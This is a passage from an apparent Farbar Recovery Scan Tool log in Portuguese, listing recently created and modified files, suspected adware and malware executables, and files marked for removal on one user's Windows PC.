10:48 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\{4DE0AE0A-8C7A-4575-A884-430BC09FAC93} 2016-03-05 22:46 - 2016-03-05 22:47 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\{76A8E867-6051-4ABA-9F35-B1418FB287FA} 2016-03-05 22:30 - 2016-03-05 22:30 - 00004013 _____ C:\Users\Cliente NS\Downloads\9B2BE4E2454347A30333ADDBA8AB85EDAC45F29B (1).torrent 2016-03-05 22:29 - 2016-03-05 22:29 - 00004013 _____ C:\Users\Cliente NS\Downloads\9B2BE4E2454347A30333ADDBA8AB85EDAC45F29B.torrent 2016-03-05 18:36 - 2016-03-05 18:36 - 08537178 _____ C:\Users\Cliente NS\Downloads\01 Be Right There.m4a 2016-03-05 10:32 - 2016-03-05 10:33 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\{7BF80F1B-AA92-4EF4-A515-43C663A4F772} 2016-03-05 10:28 - 2016-03-05 10:28 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\{A2968174-BF3B-4C6F-8C54-AA93D48ACF87} 2016-03-05 10:26 - 2016-03-05 10:26 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\{AF2494A2-529E-4396-8608-5C9082FE429D} 2016-03-04 18:56 - 2016-03-04 18:56 - 00004004 _____ C:\Users\Cliente NS\Downloads\EC0656CEDBCA7A3BCF76AA50A7A49FA1974E4BE9.torrent 2016-03-04 18:55 - 2016-03-04 18:55 - 00004273 _____ C:\Users\Cliente NS\Downloads\875752F0BA484A247A5ECF8D31654DAABDEBD1F0.torrent 2016-03-04 18:55 - 2016-03-04 18:55 - 00004273 _____ C:\Users\Cliente NS\Downloads\875752F0BA484A247A5ECF8D31654DAABDEBD1F0 (1).torrent 2016-03-04 18:54 - 2016-03-04 18:54 - 00004084 _____ C:\Users\Cliente NS\Downloads\41203B943C9B63733364E8FCCD8E2DA1234C3C9C.torrent 2016-03-04 18:18 - 2016-03-04 18:18 - 00115865 _____ C:\Users\Cliente NS\Downloads\9D55C8973543581FF8178427107B2FA9B93A9D63.torrent 2016-03-04 10:46 - 2016-03-04 10:46 - 00000000 ____D C:\Users\Todos os Usuários\serfe 2016-03-04 10:46 - 2016-03-04 10:46 - 00000000 ____D C:\ProgramData\serfe 2016-03-03 01:30 - 2016-03-03 01:30 - 00000000 ____D C:\Users\Cliente NS\Downloads\The Qemists - Warrior Sound (Japanese Limited Edition) - 2016 (320 kbps) 2016-03-03 00:42 - 2016-03-03 01:21 - 119864317 _____ C:\Users\Cliente NS\Downloads\The Qemists - Warrior Sound (Japanese Limited Edition) - 2016 (320 kbps).zip 2016-03-02 20:04 - 2016-03-02 20:04 - 00003658 _____ C:\Users\Cliente NS\Downloads\5EB13F8C4BB6D7D760DC06937ED08657AE0A8B41.torrent 2016-03-02 15:38 - 2016-03-17 02:07 - 00000000 ____D C:\Users\Cliente NS\Desktop\Pen Drive 2016-03-02 15:36 - 2016-03-02 15:36 - 00000000 ____D C:\Users\Cliente NS\Documents\Química 2016-03-02 11:37 - 2016-03-17 08:08 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\svshost 2016-02-29 12:44 - 2016-02-29 12:44 - 00014889 _____ C:\Users\Cliente NS\Downloads\B9AC87C7CCE549C83B2635B9F39C4770E957313E.torrent 2016-02-29 11:14 - 2016-02-29 11:42 - 1689307405 _____ C:\Users\Cliente NS\Downloads\[Saiko-Animes]_Hellsing-Ultimate-OVA_01_[BluRay-1080p]_[Kyoshiro].mkv 2016-02-29 11:11 - 2016-02-29 11:11 - 00060232 _____ C:\Users\Cliente NS\Downloads\Download Hellsing ultimate 1080p.pdf 2016-02-28 21:39 - 2016-02-28 21:39 - 00000340 _____ C:\Users\Cliente NS\Downloads\Timeline.txt 2016-02-28 17:48 - 2016-02-28 17:48 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\{9197831D-4B81-440C-8A37-4461D19D27FA} 2016-02-27 21:50 - 2016-02-27 21:50 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\{6C7CD146-3090-4A30-A6F5-02FA447C9C85} 2016-02-27 21:33 - 2016-02-27 21:33 - 00004519 _____ C:\Users\Cliente NS\Downloads\E066564A80BAE1C62D718EE36394729DA16358A6.torrent 2016-02-27 21:32 - 2016-02-27 21:32 - 00004991 _____ C:\Users\Cliente NS\Downloads\E200A1EF09771C909A2455ED35F69EA98F8C24C1.torrent 2016-02-27 18:26 - 2016-02-27 18:26 - 00030770 _____ C:\Users\Cliente NS\Downloads\The Walking Dead – 5ª Temporada Disco 4 – DVD-R [AUTORADO].torrent 2016-02-27 18:24 - 2016-02-27 18:24 - 00048275 _____ C:\Users\Cliente NS\Downloads\EXTRA.htm 2016-02-27 16:33 - 2016-02-27 16:34 - 52674810 _____ C:\Users\Cliente NS\Downloads\Química.zip 2016-02-27 16:27 - 2016-02-27 16:27 - 06094366 _____ C:\Users\Cliente NS\Downloads\2.1. QUÍMICA -TEORIA - LIVRO 2.pdf 2016-02-27 16:14 - 2016-02-27 16:14 - 09555889 _____ C:\Users\Cliente NS\Downloads\1.1. QUÍMICA -TEORIA - LIVRO 1.pdf 2016-02-26 17:00 - 2016-02-26 17:01 - 03021424 _____ C:\Users\Cliente NS\Downloads\gas-properties_en.jar 2016-02-26 13:36 - 2016-02-26 17:28 - 601005280 _____ C:\Users\Cliente NS\Downloads\5621.S5D5.3xtr4s.DVDR.part4.rar.opdownload 2016-02-25 23:27 - 2016-02-25 23:28 - 11272627 _____ C:\Users\Cliente NS\Downloads\CBBTSS.zip 2016-02-25 22:58 - 2016-02-25 23:04 - 37368660 _____ C:\Users\Cliente NS\Downloads\videoplayback.mp4 2016-02-25 21:49 - 2016-02-25 21:54 - 00000000 ____D C:\Users\Cliente NS\Desktop\Correios 2016-02-25 19:45 - 2016-02-25 19:45 - 00076112 _____ C:\Users\Cliente NS\Downloads\5621.S5D5.3xtr4s.DVDR.part5.rar.exe 2016-02-25 19:36 - 2016-02-25 19:36 - 00043623 _____ C:\Users\Cliente NS\Downloads\FlashPlayer25.jse 2016-02-25 19:35 - 2016-02-25 19:35 - 00116384 _____ C:\Users\Cliente NS\Downloads\The.Walking.Dead.Quarta.Temporada.DVDR-Cyssum11.torrent 2016-02-25 19:33 - 2016-02-25 19:33 - 00112617 _____ C:\Users\Cliente NS\Downloads\2634086639BA2E88580C8CC91E7E0EFECCAB24AC.torrent 2016-02-25 18:13 - 2016-02-25 18:13 - 07622499 _____ C:\Users\Cliente NS\Downloads\ZIYS.zip 2016-02-24 21:51 - 2016-02-24 21:51 - 00083968 _____ () C:\Users\Cliente NS\Downloads\FlashPlayer25.exe 2016-02-24 19:09 - 2016-02-24 19:09 - 00132646 _____ C:\Users\Cliente NS\Downloads\86EAE68350EFB2E81C06FA383260D4C6C82663C7.torrent 2016-02-23 19:04 - 2016-02-23 19:04 - 00019382 _____ C:\Users\Cliente NS\Downloads\Vingadores.Era.de.Ultron.BluRay.720p.Dublado.rar 2016-02-23 18:41 - 2016-02-23 18:41 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\WinZiper 2016-02-23 13:37 - 2016-02-23 13:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip 2016-02-22 14:16 - 2016-02-22 14:16 - 00001247 _____ C:\Users\Cliente NS\Desktop\Any Video Converter Professional.lnk 2016-02-21 16:40 - 2016-02-21 16:41 - 05297473 _____ C:\Users\Cliente NS\Downloads\TWD.S5D1-WWW.BAIXARDVDR.COM.part2.rar.opdownload 2016-02-20 17:42 - 2016-02-20 17:42 - 00255001 _____ C:\Users\Cliente NS\Desktop\cronograma_-_aprendizagem_básica_-_geral.pdf 2016-02-20 15:27 - 2016-02-20 15:27 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\{51AF3D1D-CC3E-45D7-8461-0ACDE35FC987} 2016-02-20 13:56 - 2016-02-26 14:16 - 00000000 ____D C:\Users\Cliente NS\Desktop\Nova pasta 2016-02-20 03:24 - 2016-02-23 03:11 - 00000845 _____ C:\Users\Cliente NS\Desktop\--.txt 2016-02-19 22:38 - 2016-02-19 22:38 - 06729261 _____ C:\Users\Cliente NS\Downloads\video-1455930741.mp4 2016-02-19 19:19 - 2016-02-19 19:19 - 00000000 ____D C:\Users\Todos os Usuários\{BAF091CA-86C4-4627-ADA1-897E2621C1B0} 2016-02-19 19:19 - 2016-02-19 19:19 - 00000000 ____D C:\ProgramData\{BAF091CA-86C4-4627-ADA1-897E2621C1B0} 2016-02-19 18:48 - 2016-02-19 18:58 - 39897358 _____ C:\Users\Cliente NS\Downloads\Advanced Systemcare 9 PRO + Crack - By SmokeTutors.rar 2016-02-19 18:19 - 2016-02-19 18:20 - 01768236 _____ C:\Users\Cliente NS\Downloads\Windows6.0-KB942288-v2-x86 (2).msu 2016-02-19 18:19 - 2016-02-19 18:19 - 03327000 _____ C:\Users\Cliente NS\Downloads\WindowsXP-KB942288-v3-x86.exe 2016-02-19 18:16 - 2016-02-19 18:16 - 01768236 _____ C:\Users\Cliente NS\Downloads\Windows6.0-KB942288-v2-x86 (1).msu 2016-02-19 18:04 - 2016-02-19 18:04 - 41175064 _____ (IObit ) C:\Users\Cliente NS\Downloads\asc9pro-cnet.exe 2016-02-19 18:00 - 2016-02-19 18:00 - 00000000 ____D C:\Windows\Tasks\ImCleanDisabled 2016-02-19 17:59 - 2016-02-19 19:14 - 00000000 ____D C:\Users\Cliente NS\AppData\LocalLow\IObit 2016-02-19 17:59 - 2016-02-19 18:00 - 00000000 ____D C:\Users\Todos os Usuários\ProductData 2016-02-19 17:59 - 2016-02-19 18:00 - 00000000 ____D C:\ProgramData\ProductData 2016-02-19 17:59 - 2016-02-19 17:59 - 00000000 ____D C:\Users\Todos os Usuários\{FD6F83C0-EC70-4581-8361-C70CD1AA4B98} 2016-02-19 17:59 - 2016-02-19 17:59 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\ProductData 2016-02-19 17:59 - 2016-02-19 17:59 - 00000000 ____D C:\ProgramData\{FD6F83C0-EC70-4581-8361-C70CD1AA4B98} 2016-02-19 17:59 - 2016-02-19 17:59 - 00000000 ____D C:\Program Files\Common Files\IObit 2016-02-19 17:58 - 2016-02-19 18:00 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\IObit 2016-02-19 17:57 - 2016-02-19 19:14 - 00000000 ____D C:\Program Files\IObit 2016-02-19 17:57 - 2016-02-19 18:00 - 00000000 ____D C:\Users\Todos os Usuários\IObit 2016-02-19 17:57 - 2016-02-19 18:00 - 00000000 ____D C:\ProgramData\IObit 2016-02-19 17:46 - 2016-02-19 17:48 - 27870824 _____ (Riot Games) C:\Users\Cliente NS\Downloads\LeagueofLegends_BR_Installer_9_15_2014.exe 2016-02-19 03:37 - 2016-02-19 03:37 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\{789CF441-580C-430C-A4DF-C8FFF038851B} 2016-02-18 19:09 - 2016-02-18 19:10 - 16280640 _____ C:\Users\Cliente NS\Downloads\Walking_Cast_56.mp3.opdownload 2016-02-18 14:31 - 2016-02-18 14:31 - 00935501 _____ C:\Users\Cliente NS\Downloads\Aula de Gases.pdf 2016-02-17 02:28 - 2016-02-17 02:28 - 00000000 ____D C:\Users\Cliente NS\Downloads\Coldplay Feat. Beyonc - Hymn For The Weekend 2016-02-17 02:12 - 2016-02-17 02:13 - 09273919 _____ C:\Users\Cliente NS\Downloads\03 Hymn for the Weekend.m4a 2016-02-16 13:20 - 2016-02-16 13:20 - 00000000 ____D C:\Users\Cliente NS\Downloads\Rihanna - Anti (Deluxe) ==================== Um Mês Modificados arquivos e pastas ======== (Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.) 2016-03-17 08:21 - 2015-04-15 09:15 - 13864960 ___SH C:\Users\Cliente NS\Downloads\Thumbs.db 2016-03-17 08:18 - 2015-06-23 13:02 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\BitTorrent 2016-03-17 08:14 - 2015-11-14 06:14 - 00000276 _____ C:\Windows\Tasks\PC-Mechanic Maintenance.job 2016-03-17 08:00 - 2015-05-30 10:45 - 00001028 _____ C:\Users\Public\Desktop\VLC media player.lnk 2016-03-17 07:58 - 2015-11-14 06:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Uniblue 2016-03-17 07:52 - 2015-11-14 06:13 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\Uniblue 2016-03-17 07:50 - 2015-08-14 19:50 - 00000350 _____ C:\Windows\Tasks\Bidaily Synchronize Task[8da6].job 2016-03-17 07:48 - 2009-07-14 01:34 - 00019520 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2016-03-17 07:48 - 2009-07-14 01:34 - 00019520 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2016-03-17 07:38 - 2014-07-28 14:45 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\Skype 2016-03-17 07:37 - 2016-02-11 14:25 - 00001098 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1755460986-2849130812-3623152037-1000UA.job 2016-03-17 07:36 - 2015-07-21 22:03 - 00000000 ____D C:\Program Files\Steam 2016-03-17 07:36 - 2015-05-29 08:36 - 00000000 ____D C:\Program Files\WinZipper 2016-03-17 07:35 - 2015-10-22 07:12 - 00000000 ____D C:\Users\Todos os Usuários\BluetoothPoint 2016-03-17 07:35 - 2015-10-22 07:12 - 00000000 ____D C:\ProgramData\BluetoothPoint 2016-03-17 07:35 - 2015-10-21 12:12 - 00000000 ____D C:\Users\Todos os Usuários\ApptnioPhtooteulB 2016-03-17 07:35 - 2015-10-21 12:12 - 00000000 ____D C:\ProgramData\ApptnioPhtooteulB 2016-03-17 07:35 - 2015-10-21 09:04 - 00000000 ____D C:\Users\Todos os Usuários\Zitenop 2016-03-17 07:35 - 2015-10-21 09:04 - 00000000 ____D C:\ProgramData\Zitenop 2016-03-17 07:33 - 2015-11-14 06:13 - 00000290 _____ C:\Windows\Tasks\PC-Mechanic Startup.job 2016-03-17 07:33 - 2009-07-14 01:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2016-03-17 02:35 - 2014-12-26 21:32 - 00000386 _____ C:\Windows\Tasks\update-S-1-5-21-1755460986-2849130812-3623152037-1000.job 2016-03-17 01:45 - 2014-05-15 21:56 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\Last.fm 2016-03-16 23:17 - 2015-12-29 01:30 - 00002403 _____ C:\Users\Cliente NS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2016-03-16 23:17 - 2015-12-29 01:30 - 00002395 _____ C:\Users\Cliente NS\Desktop\Google Chrome.lnk 2016-03-16 23:17 - 2014-11-16 17:01 - 00001085 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera 35.lnk 2016-03-16 23:17 - 2014-10-14 16:33 - 00001085 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk 2016-03-16 23:17 - 2014-05-19 06:20 - 00001062 _____ C:\Users\Cliente NS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-16 22:59 - 2014-12-26 21:32 - 00000386 _____ C:\Windows\Tasks\update-sys.job 2016-03-16 22:59 - 2014-09-17 05:29 - 00000286 __RSH C:\Users\Todos os Usuários\ntuser.pol 2016-03-16 22:59 - 2014-09-17 05:29 - 00000286 __RSH C:\ProgramData\ntuser.pol 2016-03-16 21:02 - 2015-10-31 14:54 - 00000074 _____ C:\Users\Todos os Usuários\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat 2016-03-16 21:02 - 2015-10-31 14:54 - 00000074 _____ C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat 2016-03-16 20:23 - 2014-05-18 13:37 - 00000000 ____D C:\Users\Todos os Usuários\baidu 2016-03-16 20:23 - 2014-05-18 13:37 - 00000000 ____D C:\ProgramData\baidu 2016-03-16 20:23 - 2014-05-18 13:00 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\baidu 2016-03-16 16:10 - 2015-08-15 19:16 - 00000350 _____ C:\Windows\Tasks\Superclean.job 2016-03-16 15:41 - 2015-08-31 15:12 - 00000000 ____D C:\Users\Cliente NS\Documents\3x4 2016-03-16 15:07 - 2015-05-30 10:45 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\vlc 2016-03-16 14:35 - 2016-02-11 14:25 - 00001046 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1755460986-2849130812-3623152037-1000Core.job 2016-03-16 12:05 - 2015-07-22 12:05 - 00000000 ____D C:\Users\Cliente NS\AppData\LocalLow\SmartWeb 2016-03-15 10:38 - 2015-07-21 21:36 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\RunDir 2016-03-15 02:07 - 2014-07-08 23:13 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\AnvSoft 2016-03-14 15:13 - 2009-07-13 23:37 - 00000000 ____D C:\Windows\inf 2016-03-12 21:50 - 2015-09-28 20:48 - 00000964 _____ C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job 2016-03-11 16:11 - 2015-11-23 20:34 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\Adobe 2016-03-11 16:10 - 2015-01-27 20:16 - 00797376 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe 2016-03-11 16:10 - 2015-01-27 20:16 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl 2016-03-11 11:41 - 2014-07-24 23:23 - 00000000 ____D C:\Users\Cliente NS\Documents\Bigasoft Total Video Converter 2016-03-11 10:05 - 2015-08-03 20:17 - 00000132 _____ C:\Users\Cliente NS\AppData\Roaming\Preferências do Formato PNG do Adobe CS6 2016-03-11 10:04 - 2014-06-04 22:55 - 00024576 ____H C:\Users\Cliente NS\Documents\photothumb.db 2016-03-10 20:15 - 2014-09-21 21:13 - 00000000 ____D C:\Program Files\Opera 2016-03-02 11:37 - 2015-06-11 22:37 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\SystemDir 2016-02-29 15:22 - 2014-05-13 15:53 - 00005376 _____ C:\Windows\system32\PerfStringBackup.INI 2016-02-29 15:22 - 2009-07-29 15:31 - 00364038 _____ C:\Windows\system32\prfc0416.dat 2016-02-29 15:22 - 2009-07-29 15:31 - 00252924 _____ C:\Windows\system32\prfh0416.dat 2016-02-28 16:59 - 2014-12-16 15:45 - 00041984 ____H C:\Users\Cliente NS\Desktop\photothumb.db 2016-02-23 18:41 - 2015-12-23 01:42 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\eCyber 2016-02-20 17:51 - 2014-07-02 18:04 - 00000236 _____ C:\Users\Cliente NS\AppData\default.pls 2016-02-20 15:27 - 2014-05-24 13:21 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\Windows Live 2016-02-18 01:28 - 2009-07-13 23:37 - 00000000 ____D C:\Windows\system32\NDF 2016-02-17 23:10 - 2014-06-17 20:09 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\Vso ==================== Arquivos na raiz de alguns diretórios ======= 2015-05-06 17:25 - 2015-05-06 17:32 - 0004281 ____N () C:\Program Files\CountryList.txt 2015-05-06 17:25 - 2015-05-06 17:32 - 4475354 ____N (IMANDIX) C:\Program Files\CoverPro.exe 2015-05-06 17:25 - 2015-05-06 17:32 - 0062722 ____N () C:\Program Files\Forms.DEU 2015-05-06 17:25 - 2015-05-06 17:32 - 0062848 ____N () C:\Program Files\Forms.ENU 2015-05-06 17:25 - 2015-05-06 17:32 - 0063332 ____N () C:\Program Files\Forms.ITA 2015-05-06 17:25 - 2015-05-06 17:32 - 0063860 ____N () C:\Program Files\Forms.NLD 2015-05-06 17:25 - 2015-05-06 17:32 - 0063529 ____N () C:\Program Files\Forms.PTB 2015-05-06 17:25 - 2015-05-06 17:32 - 0001471 ____N () C:\Program Files\Forms_Template.txt 2016-03-16 23:08 - 2016-03-17 02:46 - 6000640 _____ () C:\Program Files\GUTA554.tmp 2015-05-06 17:25 - 2015-05-06 17:32 - 0002330 ____N () C:\Program Files\Hints.BTP 2015-05-06 17:25 - 2015-05-06 17:32 - 0002323 ____N () C:\Program Files\Hints.DEU 2015-05-06 17:25 - 2015-05-06 17:32 - 0002330 ____N () C:\Program Files\Hints.ENU 2015-05-06 17:25 - 2015-05-06 17:32 - 0002400 ____N () C:\Program Files\Hints.ITA 2015-05-06 17:25 - 2015-05-06 17:32 - 0002336 ____N () C:\Program Files\Hints.NLD 2015-05-06 17:25 - 2015-05-06 17:32 - 0002309 ____N () C:\Program Files\Hints.PTB 2015-05-06 17:25 - 2015-05-06 17:32 - 0000877 ____N () C:\Program Files\Hints_Template.txt 2015-05-06 17:25 - 2015-05-06 17:32 - 0004594 ____N () C:\Program Files\Messages.DEU 2015-05-06 17:25 - 2015-05-06 17:32 - 0004415 ____N () C:\Program Files\Messages.ENU 2015-05-06 17:25 - 2015-05-06 17:32 - 0004583 ____N () C:\Program Files\Messages.ITA 2015-05-06 17:25 - 2015-05-06 17:32 - 0004329 ____N () C:\Program Files\Messages.NLD 2015-05-06 17:25 - 2015-05-06 17:32 - 0004359 ____N () C:\Program Files\Messages.PTB 2015-05-06 17:25 - 2015-05-06 17:32 - 2494464 ____N (Polybytes®, Inc.) C:\Program Files\PolyImagePro.dll 2015-05-06 17:25 - 2015-05-06 17:32 - 0000002 ____N () C:\Program Files\RecentProjects.txt 2015-05-06 17:29 - 2015-05-06 21:01 - 0000035 _____ () C:\Program Files\Settings.txt 2015-12-25 09:10 - 2015-12-25 09:10 - 2770376 _____ (iBank) C:\Program Files\SSFK.exe 2015-05-06 17:25 - 2015-05-06 17:32 - 0003620 ____N () C:\Program Files\version.txt 2014-05-19 14:06 - 2014-05-19 14:06 - 0000818 _____ () C:\Program Files\µTorrent.lnk 2014-09-13 09:25 - 2014-09-13 09:25 - 0000000 _____ () C:\Users\Cliente NS\AppData\Roaming\08cd1e5 2016-03-16 12:13 - 2016-03-16 12:15 - 3962192 _____ () C:\Users\Cliente NS\AppData\Roaming\ad94de122951.exe 2014-09-13 09:25 - 2014-09-13 09:25 - 0000000 _____ () C:\Users\Cliente NS\AppData\Roaming\ad9eafa 2015-08-09 18:11 - 2015-08-09 18:11 - 0000020 _____ () C:\Users\Cliente NS\AppData\Roaming\appdataFr2.bin 2015-08-03 14:11 - 2015-08-03 14:11 - 0000024 _____ () C:\Users\Cliente NS\AppData\Roaming\appdataFr25.bin 2016-03-16 20:53 - 2016-03-16 20:57 - 0001288 _____ () C:\Users\Cliente NS\AppData\Roaming\Bubble Dock.boostrap.log 2016-03-16 20:54 - 2016-03-16 20:56 - 0005745 _____ () C:\Users\Cliente NS\AppData\Roaming\Bubble Dock.installation.log 2016-03-16 12:14 - 2015-12-10 07:39 - 1015808 _____ (d) C:\Users\Cliente NS\AppData\Roaming\download.exe 2014-05-28 18:57 - 2014-05-28 18:57 - 0000012 _____ () C:\Users\Cliente NS\AppData\Roaming\id.txt 2014-06-17 20:09 - 2014-07-08 17:13 - 0087608 _____ () C:\Users\Cliente NS\AppData\Roaming\inst.exe 2016-03-16 12:14 - 2016-03-16 12:14 - 0621568 _____ (The OpenSSL Project, http://www.openssl.org/) C:\Users\Cliente NS\AppData\Roaming\libeay32.dll 2016-03-16 12:12 - 2016-03-02 10:49 - 1888256 _____ () C:\Users\Cliente NS\AppData\Roaming\msiql.exe 2014-06-17 20:09 - 2014-07-08 17:13 - 0007887 _____ () C:\Users\Cliente NS\AppData\Roaming\pcouffin.cat 2014-06-17 20:09 - 2014-07-08 17:13 - 0001144 _____ () C:\Users\Cliente NS\AppData\Roaming\pcouffin.inf 2014-06-17 20:09 - 2014-07-08 17:13 - 0000055 _____ () C:\Users\Cliente NS\AppData\Roaming\pcouffin.log 2014-06-17 20:09 - 2014-07-08 17:13 - 0047360 _____ (VSO Software) C:\Users\Cliente NS\AppData\Roaming\pcouffin.sys 2015-08-03 20:17 - 2016-03-11 10:05 - 0000132 _____ () C:\Users\Cliente NS\AppData\Roaming\Preferências do Formato PNG do Adobe CS6 2016-03-16 20:57 - 2016-03-16 20:57 - 0000078 _____ () C:\Users\Cliente NS\AppData\Roaming\Selection Tools.installation.log 2016-03-16 12:12 - 2016-01-11 14:49 - 1734656 _____ () C:\Users\Cliente NS\AppData\Roaming\service.exe 2016-03-16 12:14 - 2016-03-16 12:14 - 0162304 _____ (The OpenSSL Project, http://www.openssl.org/) C:\Users\Cliente NS\AppData\Roaming\ssleay32.dll 2016-03-16 12:12 - 2016-03-16 12:14 - 2786816 _____ (TODO: ) C:\Users\Cliente NS\AppData\Roaming\svrupg.exe 2014-05-28 18:57 - 2014-05-28 18:57 - 0135276 _____ () C:\Users\Cliente NS\AppData\Roaming\Uninstall.exe 2014-05-02 17:36 - 2014-05-02 17:36 - 2244608 _____ () C:\Users\Cliente NS\AppData\Roaming\unwrapped.exe 2014-08-17 20:49 - 2016-02-12 15:34 - 0001191 _____ () C:\Users\Cliente NS\AppData\Roaming\vso_ts_preview.xml 2014-10-28 06:22 - 2015-01-07 08:46 - 0000092 _____ () C:\Users\Cliente NS\AppData\Roaming\WB.CFG 2016-03-16 12:12 - 2016-03-16 20:17 - 0011633 _____ () C:\Users\Cliente NS\AppData\Roaming\webad.xml 2016-03-16 20:53 - 2016-03-16 20:53 - 0000097 _____ () C:\Users\Cliente NS\AppData\Roaming\WindApp.boostrap.log 2016-03-16 20:56 - 2016-03-16 20:56 - 0000078 _____ () C:\Users\Cliente NS\AppData\Roaming\WindApp.installation.log 2016-03-16 12:13 - 2015-11-14 20:08 - 2496403 _____ ( ) C:\Users\Cliente NS\AppData\Roaming\yeaplayer_51472.exe 2015-05-23 18:17 - 2015-05-23 18:17 - 0117458 _____ () C:\Users\Cliente NS\AppData\Local\32847204_stp.CIS 2015-05-23 18:17 - 2015-05-23 18:17 - 0000282 _____ () C:\Users\Cliente NS\AppData\Local\32847204_stp.CIS.part 2014-09-13 09:25 - 2014-09-13 09:25 - 0000000 _____ () C:\Users\Cliente NS\AppData\Local\4.3.cfg 2014-09-13 09:24 - 2014-09-13 09:25 - 2526337 _____ () C:\Users\Cliente NS\AppData\Local\Cliente NS1.zip 2015-07-22 23:38 - 2015-07-22 23:38 - 0000000 _____ () C:\Users\Cliente NS\AppData\Local\Temp.dat 2014-12-26 21:32 - 2014-12-26 21:32 - 0000003 _____ () C:\Users\Cliente NS\AppData\Local\updater.log 2014-12-26 21:32 - 2015-10-02 10:33 - 0000412 _____ () C:\Users\Cliente NS\AppData\Local\UserProducts.xml 2015-01-28 22:37 - 2015-01-28 22:37 - 0000000 _____ () C:\Users\Cliente NS\AppData\Local\{21D972DA-5E88-4231-9AA6-7E30341F464B} 2014-11-09 19:02 - 2014-11-09 19:02 - 0000165 _____ () C:\ProgramData\bc.ini 2015-07-15 08:06 - 2015-06-15 18:42 - 99218304 ___SH () C:\ProgramData\msjoionn.exe 2016-03-16 12:12 - 2016-01-11 14:49 - 1734656 _____ () C:\ProgramData\service.exe 2016-03-16 12:14 - 2016-03-16 12:14 - 1736192 _____ () C:\ProgramData\upgsvr.exe 2015-10-31 14:54 - 2016-03-16 21:02 - 0000074 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat Arquivos para serem movidos ou deletados: ==================== C:\Users\Cliente NS\AppData\Local\Temp\LightGate.exe C:\Users\Cliente NS\AppData\Local\Temp\ms9002.tmp.exe C:\Users\Cliente NS\AppData\Local\Temp\carssn.exe C:\Users\Cliente NS\AppData\Local\Temp\is-40C13.tmp\print.exe C:\ProgramData\msjoionn.exe C:\ProgramData\service.exe C:\ProgramData\upgsvr.exe C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat C:\Users\Todos os Usuários\msjoionn.exe C:\Users\Todos os Usuários\service.exe C:\Users\Todos os Usuários\upgsvr.exe C:\Users\Todos os Usuários\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat C:\Windows\Tasks\{303C0ACD-2FF9-44E3-A4B8-2F148042D1BE}.job C:\Windows\Tasks\{6A128791-4857-4484-9BB2-71D4C1257200}.job C:\Windows\Tasks\{BF5B92D7-AA52-4827-8F1C-EE0A9E7B43AC}.job Alguns arquivos em TEMP: ==================== C:\Users\Cliente NS\AppData\Local\Temp\53V4DTY1PS.exe C:\Users\Cliente NS\AppData\Local\Temp\781C.tmp.exe C:\Users\Cliente NS\AppData\Local\Temp\8FKW4W3JLB.exe C:\Users\Cliente NS\AppData\Local\Temp\94492374-D784-9438-D90A-88FF9BFD79E8.exe C:\Users\Cliente NS\AppData\Local\Temp\9I1Y1FVION.exe C:\Users\Cliente NS\AppData\Local\Temp\A443FE17-5C97-711F-43A5-7F5243D9D11B.dll C:\Users\Cliente NS\AppData\Local\Temp\A443FE17-5C97-711F-43A5-7F5243D9D11B.exe C:\Users\Cliente NS\AppData\Local\Temp\AAFE.tmp.exe C:\Users\Cliente NS\AppData\Local\Temp\ASJPUDHN4C.exe C:\Users\Cliente NS\AppData\Local\Temp\autorun.exe C:\Users\Cliente NS\AppData\Local\Temp\Browser_V5.6.10551.6_r_4728_(Build1602291105).exe C:\Users\Cliente NS\AppData\Local\Temp\carssn.exe C:\Users\Cliente NS\AppData\Local\Temp\cdo1199993895.dll C:\Users\Cliente NS\AppData\Local\Temp\cdo1234064470.dll C:\Users\Cliente NS\AppData\Local\Temp\cdo1826550066.dll 